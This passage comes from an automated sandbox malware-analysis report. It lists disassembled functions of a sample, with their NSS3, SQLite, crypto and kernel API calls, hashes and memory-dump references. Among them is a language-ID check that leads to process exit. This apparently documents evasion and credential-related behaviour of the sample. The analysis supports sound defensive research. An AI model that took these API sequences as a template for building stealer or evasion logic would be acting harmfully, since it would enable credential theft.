Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 07f491f0626d8845c0a988a125d1017818ae5e114f08a670fe63d290814ab426
Instruction ID: 7d74fe658195df66169d24ce429af20b7ed487e90077104ba7d53aec8a490064
Opcode Fuzzy Hash: 07f491f0626d8845c0a988a125d1017818ae5e114f08a670fe63d290814ab426
Instruction Fuzzy Hash: 05F02721F499286BF71052299C10FE737854B01329F4944A1EE4C6BE92D78D9C624EFD

Function 017F46A0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,017F4956,017FE4C7), ref: 017F46A4
ExitProcess.KERNEL32 ref: 017F46D5
ExitProcess.KERNEL32 ref: 017F46DF
ExitProcess.KERNEL32 ref: 017F46E9
ExitProcess.KERNEL32 ref: 017F46F3
ExitProcess.KERNEL32 ref: 017F46FD

Strings

*, xrefs: 017F46BC

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: a309608053b6f722dae3d5029c755e2dc3d79df3febf3e61be468ca5efb95867
Instruction ID: 9a60a8fffda7a09b2795c44c65a29a77d20a149724039f66e0d7f8b4ea4a2995
Opcode Fuzzy Hash: a309608053b6f722dae3d5029c755e2dc3d79df3febf3e61be468ca5efb95867
Instruction Fuzzy Hash: 6CF05E34946208EFEB619FE4E60D75DFB71EB09703F004198E60A8A185C6785A12DF61

Function 6C590C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C591444,?,00000001,?,00000000,00000000,?,?,6C591444,?,?,00000000,?,?), ref: 6C590CB3

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C591444,?,00000001,?,00000000,00000000,?,?,6C591444,?), ref: 6C590DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C591444,?,00000001,?,00000000,00000000,?,?,6C591444,?), ref: 6C590DEC

Part of subcall function 6C5B0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C552AF5,?,?,?,?,?,6C550A1B,00000000), ref: 6C5B0F1A
Part of subcall function 6C5B0F10: malloc.MOZGLUE(00000001), ref: 6C5B0F30
Part of subcall function 6C5B0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C5B0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C591444,?,00000001,?,00000000,00000000,?), ref: 6C590DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C591444,?,00000001,?,00000000), ref: 6C590E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C591444,?,00000001,?,00000000,00000000,?), ref: 6C590E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C591444,?,00000001,?,00000000,00000000,?,?,6C591444,?,?,00000000), ref: 6C590E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C591444,?,00000001,?,00000000,00000000,?), ref: 6C590E79

Part of subcall function 6C5A1560: TlsGetValue.KERNEL32(00000000,?,6C570844,?), ref: 6C5A157A
Part of subcall function 6C5A1560: EnterCriticalSection.KERNEL32(?,?,?,6C570844,?), ref: 6C5A158F
Part of subcall function 6C5A1560: PR_Unlock.NSS3(?,?,?,?,6C570844,?), ref: 6C5A15B2

Part of subcall function 6C56B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C571397,00000000,?,6C56CF93,5B5F5EC0,00000000,?,6C571397,?), ref: 6C56B1CB
Part of subcall function 6C56B1A0: free.MOZGLUE(5B5F5EC0,?,6C56CF93,5B5F5EC0,00000000,?,6C571397,?), ref: 6C56B1D2

Part of subcall function 6C5689E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C5688AE,-00000008), ref: 6C568A04
Part of subcall function 6C5689E0: EnterCriticalSection.KERNEL32(?), ref: 6C568A15
Part of subcall function 6C5689E0: memset.VCRUNTIME140(6C5688AE,00000000,00000132), ref: 6C568A27
Part of subcall function 6C5689E0: PR_Unlock.NSS3(?), ref: 6C568A35

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 96f272f293a7d43a97cbdbd2af284531b30e72d7fcc0308a8732f274090eeee8
Instruction ID: 8d38399adc7c824378b7eaefcede3148692e61c540688977a4d84defaa6f983a
Opcode Fuzzy Hash: 96f272f293a7d43a97cbdbd2af284531b30e72d7fcc0308a8732f274090eeee8
Instruction Fuzzy Hash: 0651D9F5D002419FEB109F64DC81AAB37A8DF8921CF150465EC199BB12FB31ED1587A2

Function 6C546E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C546ED8
sqlite3_value_text.NSS3(?,?), ref: 6C546EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C546FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C546FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C546FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C547010
sqlite3_value_blob.NSS3(?,?), ref: 6C54701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C547052

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: a95f9385a3c3e80f1d4bd92e776c759acaeeb7622c878b762bbca56863db2993
Instruction ID: 0ff2a321d236bf21c25d2caa600e5423cfbccf5210a689c4f2f0816aa24d091b
Opcode Fuzzy Hash: a95f9385a3c3e80f1d4bd92e776c759acaeeb7622c878b762bbca56863db2993
Instruction Fuzzy Hash: 0C61F3B1E15246DFDB00CF68CC107EEB7B2AF85308F188569D458ABB55EB329C06CB91

Function 6C5988E0 Relevance: 12.1, APIs: 8, Instructions: 112COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5988FC

Part of subcall function 6C5ABE30: SECOID_FindOID_Util.NSS3(6C56311B,00000000,?,6C56311B,?), ref: 6C5ABE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C598913

Part of subcall function 6C5B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5587ED,00000800,6C54EF74,00000000), ref: 6C5B1000
Part of subcall function 6C5B0FF0: PR_NewLock.NSS3(?,00000800,6C54EF74,00000000), ref: 6C5B1016
Part of subcall function 6C5B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5587ED,00000008,?,00000800,6C54EF74,00000000), ref: 6C5B102B

SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6C67D864,?), ref: 6C598947

Part of subcall function 6C5AE200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C5AE245
Part of subcall function 6C5AE200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C5AE254

SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C59895B
DER_GetInteger_Util.NSS3(?), ref: 6C598973
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C598982
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C5989EC
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C598A12

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
String ID:
API String ID: 2145430656-0
Opcode ID: 5ed02457908eecdd47e268856a1871146ea3186fb52ebabf3872b99153dc60c7
Instruction ID: 348e864ac38968fed2ef7fa750bf4475d829649f79193219b784914c28bfa937
Opcode Fuzzy Hash: 5ed02457908eecdd47e268856a1871146ea3186fb52ebabf3872b99153dc60c7
Instruction Fuzzy Hash: 0A31AFB2A04A8497F710527DAC41BEE76958FD132CF280B77D919D7B82FB35C8468193

Function 6C660860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,6C667AE2,?,?,?,?,?,?,6C66798A), ref: 6C66086C

Part of subcall function 6C660930: EnterCriticalSection.KERNEL32(?,00000000,?,6C660C83), ref: 6C66094F
Part of subcall function 6C660930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C660C83), ref: 6C660974
Part of subcall function 6C660930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C660983
Part of subcall function 6C660930: _PR_MD_UNLOCK.NSS3(?,?,6C660C83), ref: 6C66099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C667AE2,?,?,?,?,?,?,6C66798A), ref: 6C66087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C667AE2,?,?,?,?,?,?,6C66798A), ref: 6C660892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C66798A), ref: 6C6608AA
free.MOZGLUE(?,00000000,00000000,?,?,6C667AE2,?,?,?,?,?,?,6C66798A), ref: 6C6608C7
free.MOZGLUE(?,00000000,00000000,?,?,6C667AE2,?,?,?,?,?,?,6C66798A), ref: 6C6608E9
free.MOZGLUE(?,6C667AE2,?,?,?,?,?,?,6C66798A), ref: 6C6608EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C667AE2,?,?,?,?,?,?,6C66798A), ref: 6C66090E

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: b4def8d99637e9731f48ff0e83159880e72be68cfe24dafe77693ef51ebcc4d7
Instruction ID: cae1466dd10c0e44ac42b6cab6d7179de9b47c413abf8bbc30b6d2b789c1a338
Opcode Fuzzy Hash: b4def8d99637e9731f48ff0e83159880e72be68cfe24dafe77693ef51ebcc4d7
Instruction Fuzzy Hash: D71186B1B012416BFF10AB9BE8C574A3778AB42358F290134E41657B40EB32E825CBDF

Function 6C4D4F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D4FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4D51BB

Strings

%s at line %d of [%.10s], xrefs: 6C4D51B4
unable to delete/modify user-function due to active statements, xrefs: 6C4D51DF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4D51A5
misuse, xrefs: 6C4D51AF

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 7835b8aca37f9bb00368ef12f1dfb35f2ce4db745913f671bfe4f5ba7003b92b
Instruction ID: 6a6096c733b704608c3ebe17b4ff27e8f13bc2c3f08a77ee45c4686ccb7ea81c
Opcode Fuzzy Hash: 7835b8aca37f9bb00368ef12f1dfb35f2ce4db745913f671bfe4f5ba7003b92b
Instruction Fuzzy Hash: 7371CEB1A0420A9BEB01DF15CC90F9A77B5FF49349F0A4528FD198BB81DB31E851CBA1

Function 6C59AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C59AB3E,?,?,?), ref: 6C59AC35

Part of subcall function 6C57CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C57CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C59AB3E,?,?,?), ref: 6C59AC55

Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B10F3
Part of subcall function 6C5B10C0: EnterCriticalSection.KERNEL32(?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B110C
Part of subcall function 6C5B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1141
Part of subcall function 6C5B10C0: PR_Unlock.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1182
Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C59AB3E,?,?), ref: 6C59AC70

Part of subcall function 6C57E300: TlsGetValue.KERNEL32 ref: 6C57E33C
Part of subcall function 6C57E300: EnterCriticalSection.KERNEL32(?), ref: 6C57E350
Part of subcall function 6C57E300: PR_Unlock.NSS3(?), ref: 6C57E5BC
Part of subcall function 6C57E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C57E5CA
Part of subcall function 6C57E300: TlsGetValue.KERNEL32 ref: 6C57E5F2
Part of subcall function 6C57E300: EnterCriticalSection.KERNEL32(?), ref: 6C57E606
Part of subcall function 6C57E300: PORT_Alloc_Util.NSS3(?), ref: 6C57E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C59AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C59AB3E), ref: 6C59ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C59AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C59AD2B

Part of subcall function 6C57F360: TlsGetValue.KERNEL32(00000000,?,6C59A904,?), ref: 6C57F38B
Part of subcall function 6C57F360: EnterCriticalSection.KERNEL32(?,?,?,6C59A904,?), ref: 6C57F3A0
Part of subcall function 6C57F360: PR_Unlock.NSS3(?,?,?,?,6C59A904,?), ref: 6C57F3D3

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: eae98966f1b27ae98f102a9936e4b3c46e2a74d7b46bb1885a6df20b4aff624e
Instruction ID: c9a0bfd40c608c951848f4aba3278406ca5b0f6c7517104b5329ff96f30e00cb
Opcode Fuzzy Hash: eae98966f1b27ae98f102a9936e4b3c46e2a74d7b46bb1885a6df20b4aff624e
Instruction Fuzzy Hash: 853127B1E002559FEB00CF698C419AF77B6EFD4328B188568E8149BB40EB31ED1587B1

Function 6C552920 Relevance: 10.6, APIs: 7, Instructions: 121timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C55294E

Part of subcall function 6C5B1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C551D97,?,?), ref: 6C5B1836

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C55296A
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C552991

Part of subcall function 6C5B1820: PR_SetError.NSS3(FFFFE005,00000000,?,6C551D97,?,?), ref: 6C5B184D

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C5529AF
PR_Now.NSS3 ref: 6C552A29
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C552A50
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C552A79

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$Error$GeneralizedTime_
String ID:
API String ID: 2509447271-0
Opcode ID: 7e2afeda566dee2ebfa5096542ada8c7c66a780cacf20e32c4fdf203f2c1d6d8
Instruction ID: 9357493c404b6a35ce3787c31e6ff4292eaa7939f4d67f53717903781678dfd9
Opcode Fuzzy Hash: 7e2afeda566dee2ebfa5096542ada8c7c66a780cacf20e32c4fdf203f2c1d6d8
Instruction Fuzzy Hash: 9D418075B093119FC714CE29CC40A4FB7E5EBD8758F558A2EF89893704E730E9198B92

Function 6C578C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C578C7C

Part of subcall function 6C619DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C660A27), ref: 6C619DC6
Part of subcall function 6C619DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C660A27), ref: 6C619DD1
Part of subcall function 6C619DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C619DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C578CB0
TlsGetValue.KERNEL32 ref: 6C578CD1
EnterCriticalSection.KERNEL32(?), ref: 6C578CE5
PR_Unlock.NSS3(?), ref: 6C578D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C578D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C578D93

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 52cae3e1bd5e45d9034c4fd48dfa523e273273ffe620a71094775cdffb9689b7
Instruction ID: 59cfc0a50d45d867fd0175a14dad8bf2f8f62b290934de0db2f36f269fa20d9f
Opcode Fuzzy Hash: 52cae3e1bd5e45d9034c4fd48dfa523e273273ffe620a71094775cdffb9689b7
Instruction Fuzzy Hash: A1318871A00201AFE7209F69CC447AAB7B4FF55318F140136EA1A77B50D770B9A4CBE6

Function 6C572E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C56E728,?,00000038,?,?,00000000), ref: 6C572E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C572E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C572E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C572E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C572E9E
PR_Unlock.NSS3(?), ref: 6C572EAB
PR_Unlock.NSS3(?), ref: 6C572F0D

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 26330aa90b392073ce27d77ccffb52ca084c3a19b84585950f56f1ace70ad810
Instruction ID: dc1ba4039ed1bf1fdb41798576100a985103f567c1b9859ea3a92d6f1f8230b5
Opcode Fuzzy Hash: 26330aa90b392073ce27d77ccffb52ca084c3a19b84585950f56f1ace70ad810
Instruction Fuzzy Hash: E931F675A00505EBEB109F69DC8587AB774EF55258F048564EC08C7B21FB31ECA4CBE2

Function 6C5BCEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C5BCD93,?), ref: 6C5BCEEE

Part of subcall function 6C5B14C0: TlsGetValue.KERNEL32 ref: 6C5B14E0
Part of subcall function 6C5B14C0: EnterCriticalSection.KERNEL32 ref: 6C5B14F5
Part of subcall function 6C5B14C0: PR_Unlock.NSS3 ref: 6C5B150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C5BCD93,?), ref: 6C5BCEFC

Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B10F3
Part of subcall function 6C5B10C0: EnterCriticalSection.KERNEL32(?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B110C
Part of subcall function 6C5B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1141
Part of subcall function 6C5B10C0: PR_Unlock.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1182
Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C5BCD93,?), ref: 6C5BCF0B

